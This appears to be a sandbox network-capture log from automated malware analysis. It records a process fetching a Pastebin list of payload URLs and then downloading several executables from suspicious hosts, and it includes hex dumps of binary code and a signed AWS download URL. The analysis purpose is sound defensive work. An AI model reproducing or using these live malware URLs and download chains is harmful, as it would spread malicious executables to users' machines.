                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: ff 50 88 5d fb e8 58 15 00 00 59 50 8d 85 08 fe ff ff 50 56 ff 15 cc b0 40 00 8b 4d fc 5f 5e 33 cd 5b e8 1b f1 ff ff c9 c3 6a 03 e8 e9 18 00 00 59 83 f8 01 74 15 6a 03 e8 dc 18 00 00 59 85 c0 75 1f 83 3d 00 d0 80 00 01 75 16 68 fc 00 00 00 e8 25 fe ff ff 68 ff 00 00 00 e8 1b fe ff ff 59 59 c3 8b ff 55 8b ec 56 e8 85 08 00 00 8b f0 85 f6 0f 84 32 01 00 00 8b 4e 5c 8b 55 08 8b c1 57 39 10 74 0d 83 c0 0c 8d b9 90 00 00 00 3b c7 72 ef 81 c1 90 00 00 00 3b c1 73 04 39 10 74 02 33 c0 85 c0 74 07 8b 50 08 85 d2 75 07 33 c0 e9 f5 00 00 00 83 fa 05 75 0c 83 60 08 00 33 c0 40 e9 e4 00 00 00 83 fa 01 0f 84 d8 00 00 00 8b 4d 0c 53 8b 5e 60 89 4e 60 8b 48 04 83 f9 08 0f 85 b6 00 00 00 6a 24 59 8b 7e 5c 83 64 39 08 00 83 c1 0c 81 f9 90 00 00 00 7c ed 8b 00 8b 7e 64 3d
                                                                                                                                                                                                                                                            Data Ascii: P]XYPPV@M_^3[jYtjYu=uh%hYYUV2N\UW9t;r;s9t3tPu3u`3@MS^`N`Hj$Y~\d9|~d=
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: 90 00 08 00 00 a3 00 55 85 00 89 35 f8 54 85 00 3b c2 73 36 83 c0 05 83 48 fb ff 66 c7 40 ff 00 0a 89 48 03 66 c7 40 1f 00 0a c6 40 21 0a 89 48 33 88 48 2f 8b 35 00 55 85 00 83 c0 40 8d 50 fb 81 c6 00 08 00 00 3b d6 72 cd 53 57 66 39 4d e6 0f 84 0e 01 00 00 8b 45 e8 3b c1 0f 84 03 01 00 00 8b 18 83 c0 04 89 45 fc 03 c3 be 00 08 00 00 89 45 f8 3b de 7c 02 8b de 39 1d f8 54 85 00 7d 6b bf 04 55 85 00 6a 40 6a 20 e8 52 f1 ff ff 59 59 85 c0 74 51 83 05 f8 54 85 00 20 8d 88 00 08 00 00 89 07 3b c1 73 31 83 c0 05 83 48 fb ff 83 60 03 00 80 60 1f 80 83 60 33 00 66 c7 40 ff 00 0a 66 c7 40 20 0a 0a c6 40 2f 00 8b 0f 83 c0 40 03 ce 8d 50 fb 3b d1 72 d2 83 c7 04 39 1d f8 54 85 00 7c a2 eb 06 8b 1d f8 54 85 00 33 ff 85 db 7e 72 8b 45 f8 8b 00 83 f8 ff 74 5c 83 f8 fe
                                                                                                                                                                                                                                                            Data Ascii: U5T;s6Hf@Hf@@!H3H/5U@P;rSWf9ME;EE;|9T}kUj@j RYYtQT ;s1H```3f@f@ @/@P;r9T|T3~rEt\
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: 59 c3 8b ff 57 68 54 bc 40 00 ff 15 bc b0 40 00 8b f8 85 ff 75 09 e8 34 fd ff ff 33 c0 5f c3 56 8b 35 b8 b0 40 00 68 90 bc 40 00 57 ff d6 68 84 bc 40 00 57 a3 2c f9 80 00 ff d6 68 78 bc 40 00 57 a3 30 f9 80 00 ff d6 68 70 bc 40 00 57 a3 34 f9 80 00 ff d6 83 3d 2c f9 80 00 00 8b 35 f0 b0 40 00 a3 38 f9 80 00 74 16 83 3d 30 f9 80 00 00 74 0d 83 3d 34 f9 80 00 00 74 04 85 c0 75 24 a1 ec b0 40 00 a3 30 f9 80 00 a1 f4 b0 40 00 c7 05 2c f9 80 00 82 26 40 00 89 35 34 f9 80 00 a3 38 f9 80 00 ff 15 e8 b0 40 00 a3 c4 d1 80 00 83 f8 ff 0f 84 c1 00 00 00 ff 35 30 f9 80 00 50 ff d6 85 c0 0f 84 b0 00 00 00 e8 dd ec ff ff ff 35 2c f9 80 00 8b 35 88 b0 40 00 ff d6 ff 35 30 f9 80 00 a3 2c f9 80 00 ff d6 ff 35 34 f9 80 00 a3 30 f9 80 00 ff d6 ff 35 38 f9 80 00 a3 34 f9 80
                                                                                                                                                                                                                                                            Data Ascii: YWhT@@u43_V5@h@Wh@W,hx@W0hp@W4=,5@8t=0t=4tu$@0@,&@548@50P5,5@50,540584
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: ff ff 59 ff 36 ff 15 1c b1 40 00 5e 5d c3 6a 08 68 50 bf 80 00 e8 cd ea ff ff e8 41 f9 ff ff 8b 40 78 85 c0 74 16 83 65 fc 00 ff d0 eb 07 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff e8 a0 17 00 00 e8 e6 ea ff ff c3 68 d7 2e 40 00 ff 15 88 b0 40 00 a3 90 fa 80 00 c3 8b ff 55 8b ec 8b 45 08 a3 94 fa 80 00 a3 98 fa 80 00 a3 9c fa 80 00 a3 a0 fa 80 00 5d c3 8b ff 55 8b ec 8b 45 08 8b 0d 4c bc 40 00 56 39 50 04 74 0f 8b f1 6b f6 0c 03 75 08 83 c0 0c 3b c6 72 ec 6b c9 0c 03 4d 08 5e 3b c1 73 05 39 50 04 74 02 33 c0 5d c3 ff 35 9c fa 80 00 ff 15 8c b0 40 00 c3 6a 20 68 70 bf 80 00 e8 21 ea ff ff 33 ff 89 7d e4 89 7d d8 8b 5d 08 83 fb 0b 7f 4b 74 15 8b c3 6a 02 59 2b c1 74 22 2b c1 74 08 2b c1 74 59 2b c1 75 43 e8 f5 f7 ff ff 8b f8 89 7d d8 85 ff 75 14 83 c8 ff e9
                                                                                                                                                                                                                                                            Data Ascii: Y6@^]jhPA@xte3@eEh.@@UE]UEL@V9Ptku;rkM^;s9Pt3]5@j hp!3}}]KtjY+t"+t+tY+uC}u
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: 24 04 f7 c1 03 00 00 00 74 24 8a 01 83 c1 01 84 c0 74 4e f7 c1 03 00 00 00 75 ef 05 00 00 00 00 8d a4 24 00 00 00 00 8d a4 24 00 00 00 00 8b 01 ba ff fe fe 7e 03 d0 83 f0 ff 33 c2 83 c1 04 a9 00 01 01 81 74 e8 8b 41 fc 84 c0 74 32 84 e4 74 24 a9 00 00 ff 00 74 13 a9 00 00 00 ff 74 02 eb cd 8d 41 ff 8b 4c 24 04 2b c1 c3 8d 41 fe 8b 4c 24 04 2b c1 c3 8d 41 fd 8b 4c 24 04 2b c1 c3 8d 41 fc 8b 4c 24 04 2b c1 c3 8b ff 55 8b ec 83 ec 24 a1 04 d0 80 00 33 c5 89 45 fc 8b 45 08 53 89 45 e0 8b 45 0c 56 57 89 45 e4 e8 a8 f1 ff ff 83 65 ec 00 83 3d b0 fa 80 00 00 89 45 e8 75 7d 68 00 bd 40 00 ff 15 20 b0 40 00 8b d8 85 db 0f 84 10 01 00 00 8b 3d b8 b0 40 00 68 f4 bc 40 00 53 ff d7 85 c0 0f 84 fa 00 00 00 8b 35 88 b0 40 00 50 ff d6 68 e4 bc 40 00 53 a3 b0 fa 80 00 ff
                                                                                                                                                                                                                                                            Data Ascii: $t$tNu$$~3tAt2t$ttAL$+AL$+AL$+AL$+U$3EESEEVWEe=Eu}h@ @=@h@S5@Ph@S
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 90 39 40 00 8b ff a0 39 40 00 a8 39 40 00 b4 39 40 00 c8 39 40 00 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8a 46 01 88 47 01 8b 45 08 5e 5f c9 c3 8d 49 00 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 8d 74 31 fc 8d 7c 39 fc f7 c7 03 00 00 00 75 24 c1 e9 02 83 e2 03 83 f9 08 72 0d fd f3 a5 fc ff 24 95 2c 3b 40 00 8b ff f7 d9 ff 24 8d dc 3a 40 00 8d 49 00 8b c7 ba 03 00 00 00 83 f9 04 72 0c 83 e0 03 2b c8 ff 24 85 30 3a 40 00 ff 24 8d 2c 3b 40 00 90 40 3a 40 00 64 3a 40 00 8c 3a 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 2c 3b 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef
                                                                                                                                                                                                                                                            Data Ascii: $9@9@9@9@9@E^_E^_FGE^_IFGFGE^_t1|9u$r$,;@$:@Ir+$0:@$,;@@:@d:@:@F#Gr$,;@IF#GFG


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 55582 | 52.217.234.57 | 443 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:55 UTC | 1143 | OUT | GET /fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-4f04-99c5-36905368220f/a02.exe?response-content-disposition=attachment%3B%20filename%3D%22a02.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBZE7SCMA&Signature=HCpifs76QUiUci%2FEbjTZ%2FcagJHI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBsaCXVzLWVhc3QtMSJHMEUCIAL7XL1t3TuPO88R%2FvmGOKGVl7p1Es82eho6cXvQ48VmAiEA7oowtGrg0V2iUhUFhl6H%2Ftflg%2F8yqqvEVz4QKWlhh9IqpwIIJBAAGgw5ODQ1MjUxMDExNDYiDFuIFyQ4tKa%2Be%2FeNTyqEAv3z8s9kfwkGDgSePx2WLCQQKhHTHvRODYsmqld%2BfnPf1j4E%2BbYhYHOLhh0iQz0sdVxhkrXPTKBqSsozj19VUfDopIPVTfRKMeNtRGQezfK2JjXbp8r7euC55noDSYZTIVM6KVVDIPF1tAGWJiFo6%2BMYnFfB2zug1t5HpisPVtMAStx8BqdelSlN37IFcwjn1aKq5iLKOG2ot6gDBMcne8C1p0SybdfD5uWEI6lrqrxtbWm19RY1WYFsJSDkbGmC0LCmMTNlAcqxgj5rGPqMkl4XffgOsPi8NIW0liFniEJ4GkgdiP0nldGzH%2BkY77zsgPaug81QSVfxWv673OeelwZ6wdBpMNTYua8GOp0B8L9l%2BRuxjpbF79wIHItOL1FbFFaPMDUqLn7BHl2kHWntZrPtX5IlaRgQbEYZGTx9IwOvskFyhN7gOZfzOo5jKzjap2b%2Bq12UXPXW48Biok56nWPXv6z27x4KbZddnlzzmD%2FmLERbURyUQwhok2kY3h9GfMX4MN0PiCzQ9hqyr2Z7uiRWWK82G8AlU01254WlEwld0nRAsugFGjj4nw%3D%3D&Expires=1710125916 HTTP/1.1
Host: bbuseruploads.s3.amazonaws.com
Connection: Keep-Alive
2024-03-11 02:30:56 UTC | 536 | IN | HTTP/1.1 200 OK
x-amz-id-2: epcZFvoQignzDn7Ub4iDc8JQYc9tP7IRcDxrlQZUuwsgmn0jOpnyqpOLAL6Bqn8MXS6hj293QVE=
x-amz-request-id: J5BMW6PGSBD3QF3H
Date: Mon, 11 Mar 2024 02:30:57 GMT
Last-Modified: Sat, 09 Mar 2024 01:51:54 GMT
ETag: "d9578a8e9ee343bc53b08fd8101f66e9"
x-amz-server-side-encryption: AES256
x-amz-version-id: P5m1d1MT8MpyYgT1paykScDnj4a0CXh_
Content-Disposition: attachment; filename="a02.exe"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Server: AmazonS3
Content-Length: 323584
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 55587 | 104.21.63.71 | 443 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:56 UTC | 134 | OUT | GET /26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: lawyerbuyer.org
Connection: Keep-Alive
2024-03-11 02:30:57 UTC | 680 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:56 GMT
Content-Type: application/x-ms-dos-executable
Content-Length: 4283792
Connection: close
Last-Modified: Sun, 10 Mar 2024 22:53:03 GMT
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 0
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R3dsf3Yb5VVVjvs6lQ%2B3xK4Uwsw9K24B4KuUVSw9e79HXVI4aQ%2Fn9IOOhMuduGv8tXr2xwtf2DUiExCkvo0RdStDWYhS%2BAyDSCotomexXBx8wNHKGLfIndUFyoqrW46XhSs%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8628201a6b100ad1-LAS
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 55588 | 172.67.169.89 | 443 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:56 UTC | 41 | OUT | GET /RNWPd.exe HTTP/1.1
Host: yip.su
2024-03-11 02:30:56 UTC | 898 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
memory: 0.36199188232421875
expires: Mon, 11 Mar 2024 02:30:56 +0000
strict-transport-security: max-age=604800
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
x-frame-options: SAMEORIGIN
Cache-Control: max-age=14400
CF-Cache-Status: EXPIRED
Last-Modified: Mon, 11 Mar 2024 02:30:53 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z79NIseXxPGllbRUFcAdocKaz3uypYodjM5tUb%2F4pPG2IJprqWgQLr5mqoJMVpqdedQehw50IqxLj1PKVr18eGcl5EUmMhtf4KLtH4SPF2VTnoi%2FOy0rqm8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8628201a98d20a01-LAS
alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            Data Ascii: ore processing...</div></div> <script> _c();</script><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f 6d 61 69 6e 22 3e 79 69 70 2e 73 75 3c 2f 64 69
                                                                                                                                                                                                                                                            Data Ascii: .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="domain">yip.su</di
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC138INData Raw: 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: ute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 55589 | 104.20.68.143 | 443 | 44264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:56 UTC | 50 | OUT | GET /raw/E0rY26ni HTTP/1.1
Host: pastebin.com
2024-03-11 02:30:56 UTC | 395 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:56 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 3
Last-Modified: Mon, 11 Mar 2024 02:30:53 GMT
Server: cloudflare
CF-RAY: 8628201a8ffb0acd-LAS
2024-03-11 02:30:56 UTC | 800 | IN | Data Ascii: 319
http://185.172.128.126/InstallSetup5.exe
https://bitbucket.org/j-upsps/microsoft_network1/downloads/a02.exe
https://shipofdestiny.com/baf14778c246e15550645e30ba78ce1c.exe
https://sty.ink/ppg8x
https://namemail.org/6779d89b7a368f4f3f340b50a9d18d71
2024-03-11 02:30:56 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 55586 | 104.21.63.71 | 443 | 44264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:56 UTC | 134 | OUT | GET /26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: lawyerbuyer.org
Connection: Keep-Alive
2024-03-11 02:30:57 UTC | 679 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:57 GMT
Content-Type: application/x-ms-dos-executable
Content-Length: 4283792
Connection: close
Last-Modified: Sun, 10 Mar 2024 22:53:03 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=c4Wns%2FE9P5dgKTrL%2FqwzwFYxW3F%2BbnDTRsOeLS4rE8YqpfLvP8%2FFZHD0uo3ELspqag2LrlusgrHw0iDbCzQZoaSH9%2BsIquYOJCODyZAh%2FWWS5hRw3s89LISnqk1CTxlz6vA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8628201a683009f1-LAS
alt-svc: h3=":443"; ma=86400


Session ID: 25 | Source IP: 192.168.2.5 | Source Port: 55591 | Destination IP: 104.21.32.142 | Destination Port: 443 | PID: 44264 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:56 UTC | 79 | OUT | GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: shipofdestiny.com
2024-03-11 02:30:57 UTC | 701 | IN | HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:57 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=D17gP%2FXzoeFGM9PaB7Luiz5b%2BZ0kGayE6Mi7WwtqCo7Cv5lFnWLOdO0CBqMmEYpvdETkmhYvkCmAKVb8aURbVy2s%2BuRLhT374E5aMvSqwkjFTpAztJJrgHkEjNUZklGu5nxR4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628201f197069e3-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-03-11 02:30:57 UTC | 135 | IN | Data Ascii: 81<a href="https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe">Temporary Redirect</a>.
2024-03-11 02:30:57 UTC | 5 | IN | Data Ascii: 0


Session ID: 26 | Source IP: 192.168.2.5 | Source Port: 55592 | Destination IP: 172.67.200.219 | Destination Port: 443 | PID: 44264 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:56 UTC | 38 | OUT | GET /ppg8x HTTP/1.1
Host: sty.ink
2024-03-11 02:30:57 UTC | 1188 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:57 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-cache, private
                                                                                                                                                                                                                                                            Set-Cookie: XSRF-TOKEN=eyJpdiI6Ik40Nklxa2kxbDduV2ZkMXpYbmsrUFE9PSIsInZhbHVlIjoieFdNcGFaWlV1OTUyQmlub2RzQkhwWTNkVjAwM0YrUTRFVW5DSmwyVDVtNzVGc2xzd2R6Z2JtK0RiVVNmc3FBeGNGYUlZZGEwbVg1QWpTZmZwcGttVGtxbktEakhpM24wZEhxdmdoSHR5a1ZSL1lIMWovQVVhZXNpMTZ2S0c0dEMiLCJtYWMiOiIzZjJjY2Y1MTJiOTU4N2U4MzQyN2FkNGM0YjUzZmRiMjMzOGM0ZWJlZmE3YjZjZDQ1N2YwNzg5Yjg0NjUzMWY0IiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:30:57 GMT; Max-Age=7200; path=/; secure
                                                                                                                                                                                                                                                            set-cookie: shortiny_session=eyJpdiI6InZQT2xvOFp6L0J0b0hZQWJnNWlKWXc9PSIsInZhbHVlIjoieGhxb2NsR21xTlRqbThyUjRVRTIxWHhYSWNXOGI1NXZSNngvUThlcExybE1FNExwZUxBVWh0SVltWFRTaWJXTE5YNElCSi9BUDNqb3ZnL1I5aGtNWDZMSE80Uk5Da0tLVUtEUGYxQy9vOUxNWWZyVkpwSDRLVVJkOUlRb2hzVTAiLCJtYWMiOiIzNWNhMDFiZGMzNTVlMThlYjNkNTAwNTZhYzEwZDRlZTA5NThhM2Y0MGU0YWZhNDFhM2U5YTI4NjQ5NTVkM2FkIiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:30:57 GMT; Max-Age=7200; path=/; httponly
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=15768000
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC


Session ID: 27 | Source IP: 192.168.2.5 | Source Port: 55593 | Destination IP: 172.67.178.183 | Destination Port: 443 | PID: 44264 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:56 UTC | 74 | OUT | GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
Host: namemail.org
2024-03-11 02:30:57 UTC | 693 | IN | HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:57 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QNhHGmBJhiBFiU1%2FscEQucKA%2F25%2B0IFC6muqhWw1aB%2F%2FwjQhLVS1q63FkOlZT30LEdqN2UejyHv1Wx2BoCuO4IpGseuoc0eUMCr7oKTCzU05hPxH9%2Bv9RezDgFjkZ88%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628201fa9750ad5-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-03-11 02:30:57 UTC | 131 | IN | Data Ascii: 7d<a href="https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe">Temporary Redirect</a>.
2024-03-11 02:30:57 UTC | 5 | IN | Data Ascii: 0


Session ID: 28 | Source IP: 192.168.2.5 | Source Port: 55597 | Destination IP: 104.21.32.142 | Destination Port: 443 | PID: 44264 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:56 UTC | 79 | OUT | GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: shipofdestiny.com
2024-03-11 02:30:57 UTC | 705 | IN | HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:57 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LkYgLdfctpTx4Ksah3W3T7bzYXEheqXWr9%2B8I5PwsObcp%2BkMZrt5Hh0iFTBWiHg%2Bw2MzheguONh9ONyJXuGOQxahnfKFDugHOnDqWm%2FpCXTNci4CCn3AhY6A%2FNKEobHMZMzIYA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628201fceae0add-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-03-11 02:30:57 UTC | 135 | IN
                                                                                                                                                                                                                                                            Data Ascii: 81<a href="https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe">Temporary Redirect</a>.
2024-03-11 02:30:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 55599 | 172.67.178.183 | 443 | 44264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:56 UTC | 74 | OUT | GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: namemail.org
2024-03-11 02:30:57 UTC | 687 | IN | HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:57 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
